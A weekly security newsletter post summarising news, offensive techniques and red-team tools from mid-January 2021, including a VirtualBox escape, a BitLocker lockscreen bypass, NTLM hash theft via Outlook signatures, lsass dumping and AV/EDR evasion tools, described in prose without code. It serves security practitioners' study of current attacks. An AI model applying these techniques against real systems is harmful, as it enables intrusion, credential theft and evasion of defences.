Last Week in Security (LWiS) - 2021-01-18
Containerd breakout PoC (@ChaosDatumz), the "glue" principle (@theluemmel), lockscreen bypass (@jonasLyk), VBox escape 0day (@Sauercl0ud), beacon shellcode generator (@ryanstvnson), browser backdoor (@_batsec_), nim obfuscation (@LittleJoeTables), and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-01-11 to 2021-01-18.
News
- Hackers steal Mimecast certificate used to encrypt customers’ M365 traffic. On the heals of the SolarWinds news, it feels like someone is going after "supply chain" type targets pretty hard.
- So Many People Are Using Signal It Caused An Outage. With WhatsApp's heavy handed, but in reality minor, privacy policy change users have been flocking to Signal. Perhaps 2021 will be the year of digital privacy? Other privacy minded services saw growth as DuckDuckGo surpasses 100 million daily search queries for the first time.
- SUNSPOT: An Implant in the Build Process. The SolarWinds fallout continues in this analysis of the implant that was used to backdoor the Orion software. Like much of the operation, this is top notch hacking. Sunspot waiting until Orion was being built to insert the backdoor, so code repositories never contained evidence. The number of mutexes and hash checks suggest a very thorough QA process for this. I wouldn't be surprise if somewhere there is a complete one-for-one Orion build environment in the basement of a government building.
- Malvuln - Finding and exploiting vulnerable Malware.. This website and @malvuln twitter account are dedicated to finding vulnerabilities in malware. Detailed reports with PoCs are provided as well!
- Microsoft Defender Remote Code Execution Vulnerability. A patch for this vulnerability (CVE-2021-1647) was part of January Patch Tuesday from Microsoft, and for normal users, Defender updates automatically in the background. For enterprises with Windows Server Update Services (WSUS), this should be a high priority patch. Any action that results in Defender scanning a malicious file could result in code execution as SYSTEM. While a PoC has been teased [UPDATE: this is vulnerability researcher bait and totally fake!], no code is public yet.
- Introducing the In-the-Wild Series. Google's Project Zero team released six posts about in-the-wild zero days, breaking down the root causes and going into technical detail for each.
- Windows 10 bug crashes your PC when you access this location. Opening a file path in a browser (Chrome and Firefox have been reported to work) will blue screen a fully patched Windows 10 machine. 1995 called and want its bug back.
Techniques
- Finding 0day to hack Apple. A CMS 0day lead to shells on a few Apple systems. This is a detailed walk through of how the vulnerabilities were found and chained, as well as the web application firewall (WAF) issues and bypasses.
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365. This exchange RCE bug doesn't want to die, as this is now the third patch bypass. As it stands it requires some administrative rights to an on-premise Exchange server (the post says DLP rights, but other sources say that is not required).
- Sailing Past Security Measures In AD. This post covers my favorite technique in red teaming: "glue." There are so many good tools and techniques out there, if you can glue a few together or modify them slightly, you can create some effective "custom" tooling. Part of the reason I write this blog is to bring these building blocks to light for myself and others to "glue" together.
- Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures. A 1x1 pixel image in the signature of a user's outlook client, which does not require elevated permissions or GUI access, can yield NTLM hashes from anyone who opens a message. Sigwhatever automates this whole process and cleanup too!
- BitLocker Lockscreen bypass. This was patched on 2020-07-14, but is quite the trick none the less. By inserting a specially crafted USB stick and using a DLL hijack for the narrator, an attacker is able to get SYSTEM account code execution on a locked Windows 10 machine. This disclosure likely made many evil maids very upset.
- Escaping VirtualBox 6.1: Part 1. If the 6 month old lockscreen bypass was too old news for you, secret club delivers a fresh 0day VirtualBox escape on Windows. A demo and PoC are available.
- Local Privilege Escalation in VMware vRealize Automation (vRA) Guest Agent Service. This reads like a CTF challenge with the use of sloppy scripting and bad permissions. 3rd party services are the source of many local privilege escalation vulnerabilities on Windows.
- Pushing back on userland hooks with Cobalt Strike. With all the direct syscall development recently, it was only a matter of time before Cobalt Strike got in on the fun. Mudge's unhook-bof adds a beacon command which will "refresh" the DLLs of the beacon process with unhooked variants.
- Hijacking connections without injections: a ShadowMoving approach to the art of pivoting. Have you ever wanted to use a legitimate process to send out your command and control traffic? By reusing existing network connections via the ancillary function driver that can be duplicated the ShadowMove authors are able to send and receive messages over an existing socket without process injection or any special privileges.
- Divide and Conquer - A technique to bypass NextGen AV. Behavioral "netgen" antivirus and endpoint detection software often gives a process a maliciousness score based on how many "bad" actions it takes. The idea behind divide and conquer (and the earlier malWASH) is to have different processes do each step of the malicious activity so no one process crosses the detection threshold of the AV/EDR product.
- Breaking The Browser – A tale of IPC, credentials and backdoors. As everyone and everything moves to a single sign on web app, the browsers have become the gatekeepers to valuable information. By injecting into Chrome, all kinds of tricks can be pulled - from credential stealing to a full implant stager.
Tools and Exploits
- StaticSyscallsDump is a Beacon Object File (BOF) for Cobalt Strike that unhooks the NtReadVirtualMemory function and uses it do create a minidump of a process (i.e. lsass). This should be able to bypass many AV/EDR solutions, and works on a wide range of Windows versions unlike other syscall memory dumpers (i.e. SharpMiniDump)
- abstractshimmer, the PoC for CVE-2020-15257 (containerd host network breakout from LWiS 2020-12-14) is out now. This could be a great breakout if you land on a somewhat privileged container.
- CSSG is an aggressor and python script used to more easily generate and format beacon shellcode. Generates beacon stageless shellcode with exposed exit method, additional formatting, encryption, encoding, compression, multiline output, etc.
- Denim makes compiling nim code for windows with obfuscator-llvm easy!
- printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The persistence mechanism can be invoked via executing wmic printer list command with any user. The shellcode will be executed with SYSTEM privileges. More details here.
- UnhookMe is a universal Windows API resolver & unhooker addressing problem of invoking unmonitored system calls from within of your Red Teams malware.
New to Me
This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!
- NimlineWhispers is a proof-of-concept port of Outflank's InlineWhispers tool, adapted to output inline assembly for Nim projects.
This post is cross-posted on SIXGEN's blog.